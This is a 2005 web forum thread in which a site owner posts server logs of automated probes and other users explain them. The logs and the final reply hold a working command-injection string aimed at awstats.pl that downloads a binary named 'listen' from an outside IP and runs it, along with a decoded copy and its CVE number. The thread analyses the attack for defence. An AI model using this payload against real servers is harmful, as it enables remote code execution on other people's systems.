Gossamer Forum
Home : General : Chit Chat :

Worm or virus attack?

Quote Reply
Worm or virus attack?
Recent days, I found that there were many requests to my site

200.24.31.19 - - [10/Nov/2005:00:34:25 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.0" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:26 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.0" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:26 +0000] "POST /xmlrpc.php HTTP/1.0" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:28 +0000] "POST /blog/xmlrpc.php HTTP/1.0" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:33 +0000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:33 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.0" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:34 +0000] "POST /drupal/xmlrpc.php HTTP/1.0" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:34 +0000] "POST /phpgroupware/xmlrpc.php HTTP/1.0" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:35 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:36 +0000] "POST /wordpress/xmlrpc.php HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:37 +0000] "POST /xmlrpc.php HTTP/1.0" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:38 +0000] "POST /xmlrpc/xmlrpc.php HTTP/1.0" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
200.24.31.19 - - [10/Nov/2005:00:34:39 +0000] "POST /xmlsrv/xmlrpc.php HTTP/1.0" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Luckily, we dont use these software at the moment.

Cheers,

Dat

Programming and creating plugins and templates
Blog
Quote Reply
Re: [tandat] Worm or virus attack? In reply to
Hi,

Looks like either a hacker trying to get into your system, or something "scanning" your server. We get a lot of those on our UNIX machines (normally looking for M$ Windows files, i.e D:/intetpub/wwwroot and .bat files). Fortuantly, we don't use M$ Windows on any publically available servers, so they won't do bugger all to us :D

TBH, your best bet is to block that IP address. athough I'm not sure how much good that'll do, as it appears to be a "general" IP address (i.e not assigned to a specific machine, such as someones PC's/ADSL etc);

http://ripe.net/....x=20&submit.y=8

Cheers

Andy (mod)
andy@ultranerds.co.uk
Want to give me something back for my help? Please see my Amazon Wish List
GLinks ULTRA Package | GLinks ULTRA Package PRO
Links SQL Plugins | Website Design and SEO | UltraNerds | ULTRAGLobals Plugin | Pre-Made Template Sets | FREE GLinks Plugins!
Quote Reply
Re: [Andy] Worm or virus attack? In reply to
Thanks Andy!

That's very scary!

To block IP would cause trouble for innocent users?

Cheers,

Dat

Programming and creating plugins and templates
Blog
Quote Reply
Re: [tandat] Worm or virus attack? In reply to
Hi,

Yeah, not the most enojyable thing in the world :(

Quote:
To block IP would cause trouble for innocent users?

It shouldn't do, as long as you only block the IPs that are trying to request your files. A wildcard should also work, i.e;

200.24.31.*

We've had a lot of problems with people accessing our sites via proxies (mainly our large forum), so we had to just block all known Proxy IP's (which enevitably will block some genuine users, but hey-ho, they should be using a *real* IP address, and not hiding :D).

Cheers

Andy (mod)
andy@ultranerds.co.uk
Want to give me something back for my help? Please see my Amazon Wish List
GLinks ULTRA Package | GLinks ULTRA Package PRO
Links SQL Plugins | Website Design and SEO | UltraNerds | ULTRAGLobals Plugin | Pre-Made Template Sets | FREE GLinks Plugins!
Quote Reply
Re: [Andy] Worm or virus attack? In reply to
Thanks for your further explanations. That's very helpful!

Cheers,

Cheers,

Dat

Programming and creating plugins and templates
Blog
Quote Reply
Re: [Andy] Worm or virus attack? In reply to
Quote:
so we had to just block all known Proxy IP's

That's not possible. You can block the web-based ones like anonymizer.com but any computer in the world can be used as a proxy.
Quote Reply
Re: [Hargreaves] Worm or virus attack? In reply to
In Reply To:
Quote:
so we had to just block all known Proxy IP's

That's not possible. You can block the web-based ones like anonymizer.com but any computer in the world can be used as a proxy.
Note the word KNOWN Wink Obviously its not possible to block *everything*, but you sure as hell can block known proxy IPs (we have a list of over 2500 proxy range IP addresses, which we block), and also people trying to "mask" their IP.

Andy (mod)
andy@ultranerds.co.uk
Want to give me something back for my help? Please see my Amazon Wish List
GLinks ULTRA Package | GLinks ULTRA Package PRO
Links SQL Plugins | Website Design and SEO | UltraNerds | ULTRAGLobals Plugin | Pre-Made Template Sets | FREE GLinks Plugins!

Last edited by:

Andy: Nov 10, 2005, 8:43 AM
Quote Reply
Re: [tandat] Worm or virus attack? In reply to
It's not a worm or a virus. It looks like someone is trying to exploit known vulnerabilities in perl and php scripts.

As long as you don't use those particular scripts you don't need to worry. You can ignore the messages in your log - you only need to block the ip's if you are being persistantly hit.
Quote Reply
Re: [Andy] Worm or virus attack? In reply to
I can't imagine that's doing anything more than slowing down your server.

People using proxies are either connecting to the Internet at work, in which case you are blocking genuine users, or they have some sort of proxy software installed, which generally jumps between proxies at random intervals, so you'll never succeed in blocking them, or thirdly they are using anonymous proxies so you don't even know they are using a proxy.
Quote Reply
Re: [tandat] Worm or virus attack? In reply to
That IP resolves to chia.udea.edu.co which looks like some sort of educational facility. It may be worthing emailing them.
Quote Reply
Re: [tandat] Worm or virus attack? In reply to
In Reply To:
200.24.31.19 - - [10/Nov/2005:00:34:25 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|

The thing of interest should be the request, not the IP address making the request. Obviously, by the '?configdir=|', it looks like someone is trying to get awstats to open a pipe that needs shell interpretation. Proper sanitisation (and using the three form version of open) prevents this. This is an attempt to exploit CVE-2005-0116 (a vuln in Awstats 6.1).

|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
Becomes
|echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen 216.102.212.115;echo YYY;echo|

So, 200.24.31.19 (chia.udea.edu.co - an infected system) tried to get you to download the file listen from 24.224.174.18 (static-224-174-18.eastlink.ca), make it executable, run it with 216.102.212.115 (adsl-216-102-212-115.buytheelection.com) on the command line (presumably, accept only connections from that host).